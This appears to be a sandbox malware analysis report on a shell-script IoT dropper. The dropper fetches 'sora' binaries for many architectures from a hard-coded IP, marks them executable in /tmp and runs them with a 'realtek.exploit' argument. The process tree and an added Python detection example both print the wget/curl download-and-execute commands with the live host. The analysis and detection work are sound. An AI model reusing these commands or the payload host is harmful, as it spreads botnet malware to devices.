Analysis

max time kernel:   20s
max time network:  22s
platform:          debian-9_armhf
resource:          debian9-armhf-20240418-en
resource tags:     arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted:         18/10/2024, 02:36

The signatures and process tree on this page come from the debian-9_armhf run; the same sample was queued as four behavioral tasks, one per emulated architecture.

Static task
  static1

Behavioral tasks (sample: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh)
  behavioral1  resource ubuntu1804-amd64-20240611-en
  behavioral2  resource debian9-armhf-20240418-en
  behavioral3  resource debian9-mipsbe-20240611-en
  behavioral4  resource debian9-mipsel-20240611-en
General

Target:  bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Size:    2KB
MD5:     2a963ff4fb99086ab454f4f26acf8b74
SHA1:    0830412185a29f4230a85d8f6eb4d15f2a165aea
SHA256:  bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1
SHA512:  7317b366deb9f38c93b54f2b7e877c2b33bb864f26e49d356446c16292f76fcf7005c5ff4540e8551f5c80c13e5964137d9f545744ce309a24016733244f01d1
Malware Config
Signatures

File and Directory Permissions Modification  (1 TTP, 14 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Process chmod, PIDs: 675, 756, 762, 768, 774, 780, 786, 792, 798, 804, 810, 818, 824, 830

Executes dropped EXE  (14 IoCs)
  /tmp/robben, executed as process robben, PIDs: 676, 757, 763, 769, 775, 781, 787, 793, 799, 805, 811, 819, 825, 831

Checks CPU configuration  (1 TTP, 14 IoCs)
  Checks CPU information which may indicate that the system is a virtual machine.
  File opened for reading: /proc/cpuinfo, by curl (14 times, one per download)
  Caveat: every hit is attributed to curl, not to the dropper script or to /tmp/robben. Reading /proc/cpuinfo at start-up is normal behaviour for curl and the libraries it links, so on its own this signature is weak evidence of sandbox evasion by the payload; weight the "Executes dropped EXE" and "Writes file to tmp directory" hits higher.

Reads runtime system information  (28 IoCs)
  File opened for reading: /proc/sys/crypto/fips_enabled, by curl (14 times)
  File opened for reading: /proc/self/auxv, by curl (14 times)
  Same caveat as above: these are the FIPS-mode and hardware-capability probes of curl's own start-up, fired once per download, not reads by the dropped binary.

System Network Configuration Discovery  (1 TTP, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  PIDs: 754 curl, 755 cat, 678 wget

Writes file to tmp directory  (1 IoC)
  Malware often drops required files in the /tmp directory.
  File opened for modification: /tmp/robben, by bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
  The shell script itself (not cat or curl) opens /tmp/robben for writing, which is what a shell redirection of a child's output into that file looks like from the monitor's point of view.
Processes

Below, <sample> stands for bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.

/tmp/<sample>.sh  /tmp/<sample>.sh   PID 643   [Writes file to tmp directory]

  Every process below is a direct child of PID 643. The script runs the same five commands, in the same order, once for each payload name; only the architecture suffix changes:

    /usr/bin/wget   wget http://93.123.85.141/bins/sora.<arch>
    /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.<arch>      [Checks CPU configuration; Reads runtime system information]
    /bin/cat        cat sora.<arch>
    /bin/chmod      chmod +x <sample>.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg   [File and Directory Permissions Modification]
    /tmp/robben     ./robben realtek.exploit                            [Executes dropped EXE]

  Child PIDs per iteration, in execution order:

    payload         wget   curl   cat    chmod  ./robben
    sora.x86        645    672    674    675    676
    sora.mips       678    754    755    756    757
    sora.x86_64     759    760    761    762    763
    sora.i468       765    766    767    768    769
    sora.i686       771    772    773    774    775
    sora.mpsl       777    778    779    780    781
    sora.arm4       783    784    785    786    787
    sora.arm5       789    790    791    792    793
    sora.arm6       795    796    797    798    799
    sora.arm7       801    802    803    804    805
    sora.ppc        807    808    809    810    811
    sora.ppc440fp   813    814    817    818    819
    sora.m68k       821    822    823    824    825
    sora.sh4        827    828    829    830    831

  In the sora.mips iteration, wget 678, curl 754 and cat 755 additionally carry the "System Network Configuration Discovery" tag.

  Reading the tree:
  - The three names in every chmod call (the script, robben, and the sandbox's own systemd-private-* directory) are exactly the contents of /tmp at that moment, which is consistent with a `chmod +x *` glob in the script rather than an explicit file list.
  - cat sora.<arch> shows no output file in its argv, yet the script process is the one that opens /tmp/robben for modification (see "Writes file to tmp directory"), so the fetched payload is being copied to the fixed name robben by shell redirection before being executed.
  - The loop never checks which architecture it is running on: it fetches and attempts to execute every build in turn, which is why the same chain appears 14 times.
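The process tree above is the classic IoT-dropper pattern: fetch a payload with wget or curl into /tmp, chmod +x everything there, run it, repeat for the next architecture. The following is an added example (not part of the sandbox report or of any product) showing how that chain can be detected from per-execve process events and how the network IOCs fall out of it. The log format ("pid= ppid= cwd= cmd=" per line) and the events in SAMPLE_LOG are constructed to mirror the tree above, including a benign build session that downloads, chmods and executes from a home directory and must not match; the staging-directory list and downloader names are assumptions you would tune for your environment.

```python
"""Flag the download -> chmod +x -> execute-from-staging chain shown in the
process tree above and pull the network IOCs out of it.

Added example, not part of the sandbox report. The log format is a
constructed one line per execve ("pid= ppid= cwd= cmd="); adapt parse_log()
to whatever your EDR or auditd export actually emits."""
import os
import re
from collections import defaultdict

STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")     # assumed world-writable drop zones
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}    # assumed fetch tools for such loops
LINE_RE = re.compile(r"^pid=(\d+)\s+ppid=(\d+)\s+cwd=(\S+)\s+cmd=(.+)$")
URL_RE = re.compile(r"^(?:https?|ftp)://([^/\s:]+)(?::\d+)?(/\S*)?$")

# Constructed events modelled on the report: parent shell 643 runs two rounds
# of the per-architecture loop; parent 900 is a benign build session that also
# downloads, chmods and executes, but in a home directory, and must not match.
SAMPLE_LOG = """\
pid=643 ppid=1 cwd=/tmp cmd=/bin/sh /tmp/dropper.sh
pid=645 ppid=643 cwd=/tmp cmd=wget http://93.123.85.141/bins/sora.x86
pid=672 ppid=643 cwd=/tmp cmd=curl -O http://93.123.85.141/bins/sora.x86
pid=674 ppid=643 cwd=/tmp cmd=cat sora.x86
pid=675 ppid=643 cwd=/tmp cmd=chmod +x dropper.sh robben systemd-private-x
pid=676 ppid=643 cwd=/tmp cmd=./robben realtek.exploit
pid=678 ppid=643 cwd=/tmp cmd=wget http://93.123.85.141/bins/sora.mips
pid=754 ppid=643 cwd=/tmp cmd=curl -O http://93.123.85.141/bins/sora.mips
pid=755 ppid=643 cwd=/tmp cmd=cat sora.mips
pid=756 ppid=643 cwd=/tmp cmd=chmod +x dropper.sh robben systemd-private-x
pid=757 ppid=643 cwd=/tmp cmd=./robben realtek.exploit
pid=900 ppid=1 cwd=/home/ops cmd=/bin/bash
pid=901 ppid=900 cwd=/home/ops cmd=curl -O https://example.org/tool.tar.gz
pid=902 ppid=900 cwd=/home/ops cmd=chmod +x build.sh
pid=903 ppid=900 cwd=/home/ops cmd=./build.sh
"""


def parse_log(text):
    """One dict per well-formed line; malformed or empty-command lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        pid, ppid, cwd, cmd = m.groups()
        argv = cmd.split()
        if argv:
            events.append({"pid": int(pid), "ppid": int(ppid), "cwd": cwd, "argv": argv})
    return events


def _in_staging(path):
    return any(path == d or path.startswith(d + "/") for d in STAGING_DIRS)


def _exec_path(ev):
    """Absolute path of argv[0] as execve resolves it; None for bare names,
    which go through PATH and therefore say nothing about the cwd."""
    prog = ev["argv"][0]
    if "/" not in prog:
        return None
    if not prog.startswith("/"):
        prog = os.path.join(ev["cwd"], prog)
    return os.path.normpath(prog)


def find_dropper_chains(events):
    """Map parent pid -> {download, chmod, exec} events for each parent whose
    children (in log order) download while sitting in a staging dir, then
    chmod +x, then execute a file that lives in a staging dir."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev["ppid"]].append(ev)
    chains = {}
    for ppid, children in by_parent.items():
        stage = {"download": None, "chmod": None, "exec": None}
        for ev in children:
            tool = os.path.basename(ev["argv"][0])
            if tool in DOWNLOADERS and _in_staging(ev["cwd"]) \
                    and any(URL_RE.match(a) for a in ev["argv"][1:]):
                stage["download"] = stage["download"] or ev
            elif tool == "chmod" and stage["download"] and "+x" in ev["argv"]:
                stage["chmod"] = stage["chmod"] or ev
            elif stage["chmod"]:
                path = _exec_path(ev)
                if path and _in_staging(path):
                    stage["exec"] = ev
                    chains[ppid] = dict(stage)
                    break
    return chains


def extract_iocs(events, parents=None):
    """Hosts, URLs and payload file names from download commands, limited to
    children of the given parent pids when `parents` is supplied."""
    iocs = {"hosts": set(), "urls": set(), "payloads": set()}
    for ev in events:
        if parents is not None and ev["ppid"] not in parents:
            continue
        if os.path.basename(ev["argv"][0]) not in DOWNLOADERS:
            continue
        for arg in ev["argv"][1:]:
            m = URL_RE.match(arg)
            if m:
                iocs["urls"].add(arg)
                iocs["hosts"].add(m.group(1))
                iocs["payloads"].add(os.path.basename(m.group(2) or ""))
    return iocs


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    found = find_dropper_chains(evs)
    for ppid, chain in found.items():
        print(f"dropper chain under pid {ppid}: download={chain['download']['pid']} "
              f"chmod={chain['chmod']['pid']} exec={chain['exec']['pid']} "
              f"({' '.join(chain['exec']['argv'])})")
    print(extract_iocs(evs, found))
```

The detector keys on where the work happens (cwd and the resolved exec path under a staging directory) rather than on the tool names alone, which is what keeps the benign `curl; chmod +x; ./build.sh` session in /home/ops out of the results. Restricting IOC extraction to children of flagged parents is deliberate: on a busy host a blanket URL sweep would pull in every legitimate download as well.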
Network
MITRE ATT&CK Enterprise v15

Defense Evasion
  File and Directory Permissions Modification (1)
    Linux and Mac File and Directory Permissions Modification (1)
  Virtualization/Sandbox Evasion (1)
    System Checks (1)